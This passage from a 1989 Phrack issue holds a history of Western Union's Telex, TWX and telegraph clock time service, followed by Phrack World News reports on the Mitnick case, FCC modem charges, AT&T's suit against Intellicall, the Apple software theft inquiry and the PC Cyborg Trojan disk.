declared on one of the White House tapes, "I don't know anything about lie
detectors other than they scare the hell out of people."
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc==

                    Volume Three, Issue 30, File #10 of 12

                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                   ===                                   ===
                   ===           Western Union           ===
                   ===   Telex, TWX, and Time Service    ===
                   ===                                   ===
                   ===         by Phone Phanatic         ===
                   ===                                   ===
                   ===        September 17, 1989         ===
                   ===                                   ===
                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

         "Until a few years ago -- maybe ten -- it was very common to
          see TWX and Telex machines in almost every business place."

There were only minor differences between Telex and TWX.  The biggest
difference was that the former was always run by Western Union, while the
latter was run by the Bell System for a number of years.  TWX literally meant
"(T)ype(W)riter e(x)change," and it was Bell's answer to competition from
Western Union.  There were "three row" and "four row" machines, meaning the
number of keys on the keyboard and how they were laid out.  The "three row"
machines were simply part of the regular phone network; that is, they could
dial out and talk to another TWX also connected on regular phone lines.

Eventually these were phased out in favor of "newer and more improved" machines
with additional keys, as well as a paper tape reader attachment which allowed
sending the same message repeatedly to many different machines.  These "four
row" machines were not on the regular phone network, but were assigned their
own area codes (410-510-610-710-810-910) where they still remain today.  The
only way a four row machine could call a three row machine or vice-versa was
through a gateway of sorts which translated some of the character set unique to
each machine.

Western Union's network was called Telex and in addition to being able to
contact (by dial up) other similar machines, Telex could connect with TWX (and
vice-versa) as well as all the Western Union public offices around the country.
Until the late 1950's or early 1960's, every small town in America had a
Western Union office.  Big cities like Chicago had perhaps a dozen of them, and
they used messengers to hand deliver telegrams around town.  Telegrams could be
placed in person at any public office, or could be called in to the nearest
public office.

By arrangement with most telcos, the Western Union office in town nearly always
had the phone number 4321, later supplemented in automated exchanges with some
prefix XXX-4321.  Telegrams could be charged to your home phone bill (this is
still the case in some communities) and from a coin phone, one did not ask for
4321, but rather, called the operator and asked for Western Union.  This was
necessary since once the telegram had been given verbally to the wire clerk,
s/he in turn had to flash the hook and get your operator back on the line to
tell them "collect five dollars and twenty cents" or whatever the cost was.
Telegrams, like phone calls, could be sent collect or billed third party.  If
you had an account with Western Union, i.e. a Telex machine in your office, you
could charge the calls there, but most likely you would simply send the
telegram from there in the first place.

Sometime in the early 1960's, Western Union filed suit against AT&T asking that
they turn over their TWX business to them.  They cited an earlier court ruling,
circa 1950's, which said AT&T was prohibited from acquiring any more telephone
operating companies except under certain conditions.  The Supreme Court agreed
with Western Union that "spoken messages" were the domain of Ma Bell, but
"written messages" were the domain of Western Union.  So Bell was required to
divest itself of the TWX network, and Western Union has operated it since,
although a few years ago they began phasing out the phrase "TWX" in favor of
"Telex II"; their original device being "Telex I" of course.  TWX still uses
ten digit dialing with 610 (Canada) or 710/910 (USA) being the leading three
digits.  Apparently 410-510 have been abandoned; or at least they are used very
little, and Bellcore has assigned 510 to the San Francisco area starting in a
year or so.  410 still has some funny things on it, like the Western Union
"Infomaster," which is a computer that functions like a gateway between Telex,
TWX, EasyLink and some other stuff.

Today, the Western Union network is but a skeleton of its former self.  Now
most of their messages are handled on dial up terminals connected to the public
phone network.  It has been estimated the TWX/Telex business is about fifty
percent of what it was a decade ago, if that much.

Then there was the Time Service, a neat thing which Western Union offered for
over seventy years, until it was discontinued in the middle 1960's.  The Time
Service provided an important function in the days before alternating current
was commonly available.  For example, Chicago didn't have AC electricity until
about 1945.  Prior to that we used DC, or direct current.

Well, to run an electric clock, you need 60 cycles AC current for obvious
reasons, so prior to the conversion from DC power to AC power, electric wall
clocks such as you see in every office were unheard of.  How were people to
tell the time of day accurately?  Enter the Western Union clock.

The Western Union, or "telegraph clock" was a spring driven wind up clock, but
with a difference.  The clocks were "perpetually self-winding," manufactured by
the Self-Winding Clock Company of New York City.  They had large batteries
inside them, known as "telephone cells" which had a life of about ten years
each.  A mechanical contrivance in the clock would rotate as the clock spring
unwound, and once each hour would cause two metal clips to contact for about
ten seconds, which would pass juice to the little motor in the clock which in
turn re-wound the main spring.  The principle was the same as the battery
operated clocks we see today.  The battery does not actually run the clock --
direct current can't do that -- but it does power the tiny motor which re-winds
the spring which actually drives the clock.

The Western Union clocks came in various sizes and shapes, ranging from the
smallest dials which were nine inches in diameter to the largest which were
about eighteen inches in diameter.  Some had sweep second hands; others did
not.  Some had a little red light bulb on the front which would flash.  The
typical model was about sixteen inches, and was found in offices, schools,
transportation depots, radio station offices, and of course in the telegraph
office itself.

The one thing all the clocks had in common was their brown metal case and
cream-colored face, with the insignia "Western Union" and their corporate logo
in those days which was a bolt of electricity, sort of like a letter "Z" laying
on its side.  And in somewhat smaller print below, the words "Naval Observatory
Time."

The local clocks in an office or school or wherever were calibrated by a
"master clock" (actually a sub-master) on the premises.  Once an hour on the
hour, the (sub) master clock would drop a metal contact for just a half second,
and send about nine volts DC up the line to all the local clocks.  They in turn
had a "tolerance" of about two minutes on both sides of the hour so that the
current coming to them would yank the minute hand exactly upright onto the
twelve from either direction if the clock was fast or slow.

The sub-master clocks in each building were in turn serviced by the master
clock in town; usually this was the one in the telegraph office.  Every hour on
the half hour, the master clock in the telegraph office would throw current to
the sub-masters, yanking them into synch as required.  And as for the telegraph
offices themselves, they were serviced twice a day by -- you guessed it -- the
Naval Observatory Master clock in Our Nation's Capitol, by the same routine.
Someone there would press half a dozen buttons at the same time, using all
available fingers; current would flow to every telegraph office and synch all
the master clocks in every community.  Western Union charged fifty cents per
month for the service, and tossed the clock in for free!  Oh yes, there was an
installation charge of about two dollars when you first had service (i.e. a
clock) installed.

The clocks were installed and maintained by the "clockman," a technician from
Western Union who spent his day going around hanging new clocks, taking them
out of service, changing batteries every few years for each clock, etc.

What a panic it was for them when "war time" (what we now call Daylight Savings
Time) came around each year!  Wally, the guy who serviced all the clocks in
downtown Chicago had to start on *Thursday* before the Sunday official
changeover just to finish them all by *Tuesday* following.  He would literally
rush in an office, use his screwdriver to open the case, twirl the hour hand
around one hour forward in the spring, (or eleven hours *forward* in the fall
since the hands could not be moved backward beyond the twelve going
counterclockwise), slam the case back on, screw it in, and move down the hall
to the next clock and repeat the process.  He could finish several dozen clocks
per day, and usually the office assigned him a helper twice a year for these
events.

He said they never bothered to line the minute hand up just right, because it
would have taken too long, and ".....anyway, as long as we got it within a
minute or so, it would synch itself the next time the master clock sent a
signal..."  Working fast, it took a minute to a minute and a half to open the
case, twirl the minute hand, put the case back on, "stop and b.s. with the
receptionist for a couple seconds" and move along.

The master clock sent its signal over regular telco phone lines.  Usually it
would terminate in the main office of whatever place it was, and the (sub)
master there would take over at that point.

Wally said it was very important to do a professional job of hanging the clock
to begin with.  It had to be level, and the pendulum had to be just right,
otherwise the clock would gain or lose more time than could be accommodated in
the hourly synching process.  He said it was a very rare clock that actually
was out by even a minute once an hour, let alone the two minutes of tolerance
built into the gear works.

     "...Sometimes I would come to work on Monday morning, and find out
     in the office that the clock line had gone open Friday evening.  So
     nobody all weekend got a signal.  Usually I would go down a manhole
     and find it open someplace where one of the Bell guys messed it up,
     or took it off and never put it back on.  To find out where it was
     open, someone in the office would 'ring out' the line; I'd go around
     downtown following the loop as we had it laid out, and keep listening
     on my headset for it.  When I found the break or the open, I would
     tie it down again and the office would release the line; but then I
     had to go to all the clocks *before* that point and restart them,
     since the constant current from the office during the search had
     usually caused them to stop."

But he said, time and again, the clocks were usually so well mounted and hung
that "...it was rare we would find one so far out of synch that we had to
adjust it manually.  Usually the first signal to make it through once I
repaired the circuit would yank everyone in town to make up for whatever they
lost or gained over the weekend..."

In 1965, Western Union decided to discontinue the Time Service.  In a nostalgic
letter to subscribers, they announced their decision to suspend operations at
the end of the current month, but said "for old time's sake" anyone who had a
clock was welcome to keep it and continue using it; there just would not be any
setting signals from the master clocks any longer.

Within a day or two of the official announcement, every Western Union clock in
the Chicago area headquarters building was gone.  The executives snatched them
off the wall, and took them home for the day when they would have historical
value.  All the clocks in the telegraph offices disappeared about the same
time, to be replaced with standard office-style electric wall clocks.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                    Volume Three, Issue 30, File #11 of 12

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN                Issue XXX/Part 1                 PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN         Special Thanks to Dark OverLord         PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


         Happy Holidays and Welcome to Issue XXX of Phrack World News!

This issue of Phrack World News contains stories and articles detailing events
and other information concerning Acid Phreak, AT&T, Apple Computer Co.,
Bellcore, Bernie S., Klaus Brunnstein, Cap'n Crunch, Captain Crook, Chaos
Communications Congress, Cheshire Catalyst, Clifford Stoll, CompuServe, Leonard
Mitchell DiCicco, Emmanuel Goldstein, FCC, Katie Hafner, Harpers Magazine,
Intellical, Michael Synergy, Kevin David Mitnick, Phiber Optik, Phonavision,
Phrozen Ghost, Prime Suspect, Sir Francis Drake, Susan Thunder, Telenet, Terra,
Tuc, Tymnet, The Well, and...

      Announcing the Fourth Annual...

                                 SummerCon '90
                               June 22-24, 1990
                             Saint Louis, Missouri

This year's convention looks to be the more incredible than ever.  Many of you
will be hearing from us directly over the next few months about what will be
taking place and where SummerCon '90 will be held specifically.  The posted
date is of course a tentative one (as we are still six months away), but any
and all changes or new information will be in PWN and passed to our network
friends.

If you are thinking about attending SummerCon '90, please find a way to contact
us as soon as possible.  If you are not on the Internet or one of the public
access Unix systems across the country, then post a message on bulletin boards
that asks who is in contact with us.  Chances are that there will be someone on
there that can reach us.

                 Knight Lightning / Forest Ranger / Taran King

      "A New Decade Is Upon Us... And The Future Never Looked Brighter!"
_______________________________________________________________________________

Mitnick's Partner Gets Community Service                      November 29, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Kathy McDonald (New York Times)

    "Man Sentenced To Community Service For Helping Steal Computer Program"

LOS ANGELES -- A federal judge has sentenced a 24-year-old suburban Calabasas
man to community service at a homeless shelter for his role in helping computer
hacker Kevin Mitnick steal a computer security program.

In rejecting a sentencing report that suggested a prison term, U.S. District
Judge Mariana Pfaelzer noted that Leonard Mitchell DiCicco had voluntarily
notified authorities of the computer hacking.

"I think you can do some good" in the community by using his computer skills
productively, Pfaelzer told DiCicco.

She sentenced DiCicco to five years of probation, during which he must complete
750 hours of community service through the Foundation for People, a Los Angeles
group that matches probationers with community service projects.

DiCicco was assigned to develop a computer system for the Anaheim Interfaith
Shelter, said Frances Dohn, a foundation official.

DiCicco also was ordered to pay $12,000 in restitution to Digital Equipment
Corporation of Massachusetts, from which Mitnick stole a computer security
program.

Assistant U.S. Attorney James Asperger agreed with the community service
sentence, saying DiCicco's cooperation had been crucial in the case against
Mitnick.

DiCicco reported Mitnick to DEC officers.  Mitnick later admitted he stole the
program and electronically brought it to California.

DiCicco pleaded guilty in July to one count of aiding and abetting the
interstate transportation of stolen property.  He admitted that in 1987 he let
Mitnick, age 25, of suburban Panorama City, use his office computer at
Voluntary Plan Administrators in Calabasas to break into the DEC system.

Mitnick pleaded guilty and was sentenced in July to one year in prison and six
months in a community treatment program aimed at breaking his "addiction" to
computer hacking.

Under a plea bargain agreement with the government, DiCicco pleaded guilty in
July in exchange for a promise that he would not be prosecuted for any of the
other instances of computer hacking he and Mitnick carried out.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

If you are looking for other articles related to Leonard Mitchell DiCicco and
the famous Kevin David Mitnick please refer to;

"Pacific Bell Means Business"                      (10/06/88) PWN XXI....Part 1
"Dangerous Hacker Is Captured"                     (No Date ) PWN XXII...Part 1
"Ex-Computer Whiz Kid Held On New Fraud Counts"    (12/16/88) PWN XXII...Part 1
"Dangerous Keyboard Artist"                        (12/20/88) PWN XXII...Part 1
"Armed With A Keyboard And Considered Dangerous"   (12/28/88) PWN XXIII..Part 1
"Dark Side Hacker Seen As Electronic Terrorist"    (01/08/89) PWN XXIII..Part 1
"Mitnick Plea Bargains"                            (03/16/89) PWN XXV....Part 1
"Mitnick Plea Bargain Rejected As Too Lenient"     (04/25/89) PWN XXVII..Part 1
"Computer Hacker Working On Another Plea Bargain"  (05/06/89) PWN XXVII..Part 1
"Mitnick Update"                                   (05/10/89) PWN XXVII..Part 1
"Kenneth Siani Speaks Out About Kevin Mitnick"     (05/23/89) PWN XXVII..Part 1
"Judge Suggests Computer Hacker Undergo Counseling"(07/17/89) PWN XXVIII.Part 1
"Authorities Backed Away From Original Allegations"(07/23/89) PWN XXVIII.Part 1
"Judge Proposes Comm. Service For Hacker's Accomp."(10/13/89) PWN XXX....Part 1
_______________________________________________________________________________

Chaos Communications Congress
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Terra of the Chaos Computer Club

On December 27-29, 1989 is the Chaos Communication Congress at Eidelstaedter
Buergerhaus, Hamburg, West Germany.

The topics of this Congress include:

-  The new German PTT law

-  Discussion about Copyright and Freedom of Information act

-  Women and Computers

-  Mailbox and other Networks (Zerberus, InterEuNet, UUCP)

-  Workshops for East and West German people to build networks between the two
   countries.

-  Discussion between Professor Klaus Brunnstein and CCC members about the
   problems of viruses and worms.

-  Workshops about Unix and UUCP for beginners, advanced, and special people

-  Presswork in a special room

-  Workshop Cyberbrain or Cyberpunk

-  Workshop and Discussion about Secure Networks (Special:  TeleTrust, coding
   mixed gateways)

The prices to enter the Congress are

33 DM for Normal people
23 DM for CCC-members
53 DM for Press

Regards,

          Terra
_______________________________________________________________________________

Phonavision At The University of California                    October 15, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken From the New York Times

CALIFORNIA -- Students at two campuses of the University of California, at
Berkeley and Los Angeles, have become the test market for a new public
video-telephone booth called Phonavision.

Its developers claim that it is the world's first video telephone for the
general public.

Each of the campuses has one of the large, silver-color phone booths in its
student union.  Phonavision opened on October 9, for a week of free
demonstrations.  Starting October 16, video phone calls from one campus to the
other will cost $10 for three minutes.

"We view all this semester as a test," said Stephen Strickland, chief executive
officer of the Los Angeles-based company, Communications Technologies, that
developed the video phones.  "We want to be sure that when we do go to market
with this service, it's as good as it can be."

"We feel we're probably six months to a year away from having a system that we
can go out and market," Strickland said.  "I see them in airport lobbies, hotel
lobbies, shopping centers, indoor high-traffic locations."  Video telephones
are already widely used in business, he added.

Phonavision callers speak to each other on standard telephone receivers.

A snapshot-size image of their own face is projected on one half of a small
screen, and the other half shows a picture of the person to whom they are
talking.

As a caller talks, the video screen shows small movements of the mouth or face.
But sudden movements mean a distorted picture.

With a tilt of a caller's head, for example, the image will move to the side in
separate parts, starting with the top of the head and moving down in a wavelike
motion.

Annalee Andres, a sophomore from Santa Ana, California, who has not yet
selected a major, was one of the first students to try out Berkeley's new video
phone.  She and her friends crowded around the phone booth in the Martin Luther
King Jr. Student Center, taking turns talking to a student from UCLA.

"I think it has a long way to go yet, but it's really cool," she said.  "I can
really see where it's leading."

Ms. Andres speculated on the effects that widespread use of video phones would
have.  "What if they catch you and you're just out of the shower?" she asked.
"It'll change dating."

Daniel Ciruli, a junior from Tucson, Arizona, majoring in computer science, was
enthusiastic about his trial session, but he said the fee would keep him away
in the future.

"It's a new toy," he said.  "But at $10 for three minutes, with only one other
Phonavision, it's not going to be something that students are beating down the
door to use."

The video phone booth offers other services:  Recording and dealing in
videotapes and a place to send and receive fax messages.  The booth accepts $1,
$5, $10 and $20 bills, as well as Mastercard and Visa.

Gary Li, a senior from Beijing, who is majoring in electrical engineering,
started setting up Berkeley's phone booth in April.  Since then he has spent
about 20 hours a week repairing kinks in the system.

Berkeley and UCLA were chosen as tryout spots for the new service because most
students know somebody at the other campus, said Strickland, the company's
chief executive.

"That's a place where we can get novelty use," he said, adding that "Berkeley
and UCLA have a reputation for being front-runner schools -- places that are
innovative, that like new technology."

Strickland said his company has spent almost three years developing
Phonavision.  He would not disclose total costs, but priced the video phone
booths at $50,000 each.
_______________________________________________________________________________

The Omnipresent Telephone                                      October 10, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from The New York Times

Whatever the psychological implications, new technology has clearly made the
phone more omnipresent.  More calls are generated because of answering
machines, now owned by 28 percent of the nation's households, according to the
Electronic Industries Association.  People who use them say they make and
receive more calls because of them.

"In olden days you would just miss the call," said Michael Beglin, a
businessman in Nashville.

Jill Goodman, an art dealer in New York, says she talks on the phone so often
that "I'm tortured about it, teased and insulted."  She uses the phone to
socialize, shop and check in with people she wants to stay in touch with but
does not want to take the time to see.

"I have two lines in the country, two lines at home in the city and three lines
in my office, if that gives you any idea of how much phone I can generate," she
said.

A month ago, after resisting initially, she decided to have a car phone
installed.  "I thought it might be nice to have a couple of hours without being
reachable," she said.  "But I didn't like not being able to reach when I wanted
to."

Increasingly, too, people are using the phone to get services, information and
products.

The 900 numbers, which require callers to pay the cost, and the 800 numbers,
paid for by the calls' recipients, are growing quickly.

Sprint Gateways started a new 900 service in May that already has 250 lines.
Callers can get wrestling trivia, financial updates, real-estate information
and a host of other data.  They can even play a version of "Family Feud," which
receives as many as 7,000 calls a day, said Adrian Toader, the director of
sales and marketing.

Telephone shopping through 800 numbers continues to grow, too.  In 1986, L.L.
Bean, the Freeport, Maine, retailer, received 60 percent of its orders by
telephone and 40 percent by mail; by 1988, telephone orders had risen to 70
percent.  Like an increasing number of retailers, L.L. Bean allows customers to
call in their orders 24 hours a day.

But callers to 800 numbers often want more than a new shirt or sweater.

Susan Dilworth, who takes telephone orders for L.L. Bean, said, "A lot of
people call and say:  'I'm coming to New England for the first time.  How
should I dress?'"  Other callers order merchandise but then begin talking about
their personal lives.  "I think they're lonely," Mrs. Dilworth said.

Indeed, these anonymous but personal contacts are so popular that some people
are becoming hooked.

Marilyn Ng-A-Qui, the acting executive director of the New York City Self-Help
Clearinghouse, said one man called looking for help because he had run up a
$5,000 bill calling 900 numbers.  "It is emerging as a problem all over the
country," she said.

Despite the deluge of telephone conversation, there are holdouts.  Lois Korey,
a partner in a New York advertising agency, writes letters whenever she can,
often suggesting lunch meetings.  "I really like to see who I'm talking to,"
she said.

But even her partner, Allen Kay, calls her from his office just four feet away.
The only time he could not telephone, Mrs. Korey said, was when he was in his
car.  And now those days are over.  "He got a car phone a month ago, and he
calls all the time," she said.  "When I sit in the front seat of his car, I try
to step on it."
_______________________________________________________________________________

Higher Phone Rates For Modem Users                            November 26, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Material gathered from an Apple digest on Usenet)

A new regulation that the FCC is quietly working on will directly affect you as
the user of a computer and modem.  The FCC proposes that users of modems should
pay extra charges for use of the public telephone network which carry their
data.

In addition, computer network services such as CompuServe, Tymnet, & Telenet
would also be charged as much as $6.00 per hour per user for use of the public
telephone network.  These charges would very likely be passed on to the
subscribers.

The money is to be collected and given to the telephone company in an effort to
raise funds lost to deregulation.

Jim Eason of KGO newstalk radio (San Francisco, California) commented on the
proposal during his afternoon radio program during which, he said he learned of
the new legislation in an article in the New York Times.  Jim took the time to
gather the addresses which are given below.

It is important that you act now.  The bureaucrats already have it in there
mind that modem users should subsidize the phone company and are now listening
to public comment.  Please stand up and make it clear that we will not stand
for any government restriction on the free exchange of information.

The people to write to about this situation are:

Chairman of the FCC
1919 M Street N.W.
Washington, D.C. 20554

Chairman, Senate Communication Subcommittee
SH-227 Hart Building
Washington, D.C. 20510

Chairman, House Telecommunication Subcommittee
B-331 Rayburn Building
Washington, D.C. 20515

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Here is a sample letter:

Dear Sir,
     Please allow me to express my displeasure with the FCC proposal which
would authorize a surcharge for the use of modems on the telephone network.
This regulation is nothing less than an attempt to restrict the free exchange
of information among the growing number of computer users.  Calls placed using
modems require no special telephone company equipment, and users of modems pay
the phone company for use of the network in the form of a monthly bill.  In
short, a modem call is the same as a voice call and therefore should not be
subject to any additional regulation.
_______________________________________________________________________________

FCC Orders Refunds to Long-Distance Companies                 November 30, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from Associated Press

WASHINGTON -- Local telephone companies may have to refund as much as $75
million to long-distance companies and large private-line business customers,
the Federal Communications Commission says.

Pacific Northwest Bell in Idaho is one of the 15 companies named.  The local
phone companies accumulated overcharges between 1985 and 1988 under FCC
guidelines that allowed prices of these high capacity private-line services to
exceed the phone companies' costs of providing the services.

The FCC ordered a refund as it considered challenges to the special pricing
scheme, which the local phone companies provide for long-distance companies or
large business customers.  The commission voted 4-0 that the scheme was legal
during the 1985-88 period, when the high prices were designed to keep too many
customers from switching from the regular public network to private lines, but
that market conditions no longer justify continuation of the special pricing.
The commission said it expects the local phone companies to refrain from
requesting such special prices in the future.

While examining the challenges to the special pricing scheme, the commission
said it found that local phone companies in some cases had charged more than
allowed under the commission's guidelines.  Therefore, the companies must
refund those charges, which could amount to as much as $75 million, the
commission said.  The FCC said the amount of the refunds will not be known
until the local phone companies file detailed reports with the commission.  The
companies have 40 days to make their filings.

The companies found not to be in compliance with the commission's pricing
guidelines from October 1, 1985 to December 31, 1986 were:

-  Diamond State
-  South Central Bell in Alabama
-  Southwestern Bell in Missouri and Oklahoma
-  Northwestern Bell in Iowa, Minnesota, Nebraska, and North Dakota
-  Pacific Northwest Bell in Idaho

Pacific Northwest Bell is now called U.S. West Communications and is the phone
company that serves most Seattle-area residents.

Companies found not complying from January 1, 1987 to December 31, 1988 were:

-  Ohio Bell
-  Wisconsin Bell
-  Southern Bell in North Carolina and South Carolina
-  South Central Bell in Mississippi and Tennessee
-  Pacific Bell
-  Nevada Bell
-  Southwestern Bell
-  Mountain Bell
-  Northwestern Bell
-  Cincinnati Bell
_______________________________________________________________________________

AT&T v. Intellicall:  Another Lawsuit                          November 8, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dallas -- AT&T filed a lawsuit charging that a Texas-based corporation equips
its pay telephones to illegally obtain billing information owned by AT&T.

The lawsuit asks for $2 million in punitive damages and an undetermined amount
in actual damages from Intellicall Inc., headquartered in Carrollton, Texas.
It also asks the U.S. District Court in Dallas to order Intellicall to stop its
unauthorized use of AT&T billing information.

At issue is how Intellicall pay phones determine the validity of calling card
numbers for billing purposes.  AT&T contends that Intellicall pay phones are
designed and programmed by Intellicall to reach into and obtain the information
directly from AT&T's card validation system.

That system, called Billing Validation Application (BVA), is a part of AT&T's
network facilities.  Before AT&T completes a call that will be charged to an
AT&T Card, its validation system verifies that the number provided by the
customer is currently valid.

Based on contractual arrangements made before the 1984 breakup of the Bell
System, regional Bell telephone companies also use the validation system.  AT&T
does not permit competitors such as Intellicall to use the system because the
system was built by AT&T and contains valuable competitive information.

AT&T alleges that when callers use an AT&T Card or Bell company calling card at
an Intellicall pay phone, the pay phone automatically places a separate call
through AT&T or local Bell facilities to a pre-programmed telephone number so
that AT&T's validation system will automatically check the card number.

If the card number is valid, the Intellicall pay phone then puts through the
original customer call.

"As a result of these practices," the lawsuit says, "Intellicall
surreptitiously and without authorization obtains validation data from AT&T,
obtains fraud control for calls by its customers without having to invest in
fraud control facilities or otherwise purchase fraud control services, imposes
costs on AT&T, and... obtains an unfair advantage over its competitors
providing pay telephone and/or long-distance service, including AT&T."

Although AT&T does not authorize other companies to accept the AT&T Card and
does not permit competitors to use its validation system, the lawsuit notes
that Intellicall could purchase validation services for Bell company calling
cards from other companies.

AT&T said it notified Intellicall that it was violating AT&T's proprietary
rights and gave Intellicall every reasonable opportunity to halt the fraudulent
validation practice.  Only after Intellicall persisted in its unfair practices
did AT&T decide to take legal action.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

AT&T v. Intellicall:  The Lawsuit Is Over                     November 13, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dallas -- AT&T and Intellicall, Inc. today announced the settlement of a
lawsuit filed by AT&T against Intellicall, seeking damages and an injunction.
AT&T had accused Intellicall of unauthorized access to AT&T's calling card
validation system.

The settlement also covered potential counterclaims which Intellicall intended
to file against AT&T.

In the agreement, Intellicall acknowledged AT&T's proprietary rights in the
Billing Validation Application system, and agreed to make modifications in its
licensed pay telephone software to safeguard against unauthorized access and
use of the AT&T system.

The terms of the agreement include an undisclosed payment by Intellicall to
AT&T to contribute to the establishment of a compliance program which will
permit AT&T to monitor unauthorized access to its billing systems.

"AT&T is pleased that a settlement recognizing AT&T's proprietary right to the
validation system was reached so quickly," said Gerald Hines, director of AT&T
Card Services.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                    Volume Three, Issue 30, File #12 of 12

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN                Issue XXX/Part 2                 PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN         Special Thanks to Dark OverLord         PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


U.S. Inquiry Into Theft From Apple                            November 19, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by John Markoff (New York Times)

A former Apple Computer Inc. engineer has said he was served with a grand jury
subpeona and told by an FBI agent that he is a suspect in a theft of software
used by the company to design its Macintosh computer.

In June a group identifying itself as the Nu Prometheus League mailed copies of
computer disks containing the software to several trade magazines and software
developers.

Grady Ward, age 38, who worked for Apple until January (1989), said that he
received the subpeona from an FBI agent, who identified himself as Steven E.
Cook.

Ward said the agent told him that he was one of five suspects drawn from a
computerized list of people who had access to the material.  The agent said the
five were considered the most likely to have taken the software.

A spokesman for the FBI in San Francisco said the agency would not comment on a
continuing investigation.

Ward said he had told the FBI he was innocent but would cooperate with the
investigation.

The theft of Apple's software has drawn a great deal of attention in Silicon
Valley, where technology and trade-secret cases have highlighted the crucial
role of skilled technical workers and the degree to which corporations depend
on their talents.

The case is unusual because the theft was apparently undertaken for
philosophical reasons and not for personal profit.

There is no indication of how many copies of the program were sent by Nu
Prometheus.

Software experts have said the programs would be useful to a company trying to
copy the distinctive appearance of the Macintosh display, but it would not
solve legal problems inherent in attempting to sell such a computer.  Apple has
successfully prevented many imitators from selling copies of its Apple II and
Macintosh computers.

The disks were accompanied by a letter that said in part:  "Our objective at
Apple is to distribute everything that prevents other manufacturers from
creating legal copies of the Macintosh.  As an organization, the Nu Prometheus
League has no ambition beyond seeing the genius of a few Apple employees
benefit the entire world."

The group said it had taken its name from the Greek god who stole fire from the
gods and gave it to man.

The letter said the action was partially in response to Apple's pending suit
against Microsoft Corp. and Hewlett-Packard Co., accusing them of copying the
"look and feel" -- the screen appearance -- of the Macintosh.

Many technology experts in Silicon Valley believe Apple does not have special
rights to its Macintosh technology because most of the features of the computer
are copied from research originally done at Xerox Corp.'s Palo Alto Research
Center during the 1970s.  The Macintosh was not introduced until 1984.

The theft came to light in June after Macweek, a trade magazine, published the
letter from Nu Prometheus.

At the time the theft was reported, executives at Apple, based in Cupertino,
California, said they took the incident seriously.

A spokeswoman said that Apple would not comment on details of the
investigation.

Ward said he had been told by the FBI agent that the agency believed Toshiba
Corp. had obtained a copy of the software and that copies of the program had
reached the Soviet Union.

The software is not restricted from export to the Communist bloc.  Its main
value is commercial as an aid in copying Apple's technology.

Ward said the FBI agent would not tell him how it believed Toshiba had obtained
a copy of the software.

Ward also said the FBI agent told him that a computer programmer had taken a
copy of the software to the Soviet Union.

Ward said the FBI agent told him he was considered a suspect because he was a
"computer hacker," had gone to a liberal college and had studied briefly at the
Massachusetts Institute of Technology's Artificial Intelligence Laboratory.

The term "hacker" was first used at MIT to describe young programmers and
hardware designers who mastered the first interactive computers in the 1960s.

Ward is the second person to be interviewed by the FBI in the investigation of
the theft.

Earlier Charles Farnham, a businessman in San Jose, California, said two FBI
agents came to his office, but identified themselves as reporters for United
Press International.

Farnham, a Macintosh enthusiast, has disclosed information about unannounced
Apple products, said that after asking him to come outside his office, the men
said they were FBI agents and proceeded to question him about Nu Prometheus
group.  He said he was not told that he was a suspect in the case.

UPI has complained to the FBI because of the incident.

Ward said he had joined Apple in 1979 and left last January to start his own
company, Illumind.  He sells computerized dictionaries used as spelling
checkers and pronunciation guides.

He said the FBI told him that one person who had been mailed a copy of the
Apple software was Mitchell Kapor, founder of Lotus Development Corporation.

Kapor returned his copy of the disk unopened, Ward said the agent told him.

Ward said the FBI had also said he was suspect because he had founded a group
for the gifted known as Cincinnatus, which the agent said had roots in Greek
mythology that were similar to the Nu Prometheus group.

Ward said the FBI was mistaken, and Cincinnatus is a reference from ancient
Roman history, not Greek mythology.
_______________________________________________________________________________

Data-Destroying Disc Sent To European Computer Users          December 13, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by John Markoff (New York Times)

A computer disk containing a destructive program known as a Trojan horse has
been mailed to computer users in at least four European countries.

It was not clear if any copies of the program had been mailed to people in the
United States.

The program, which threatens to destroy data unless a user pays a license fee
to a fictitious company in Panama City, Panama, may be a widespread attempt to
vandalize thousands of personal computers, several computer experts who have
studied the program said Tuesday, December 12.

Some computer experts said the disk was mailed by a "PC Cyborg" company to
subscribers of personal computer trade magazines, apparently using mailing
lists.

The disk is professionally packaged and accompanied by a brochure that
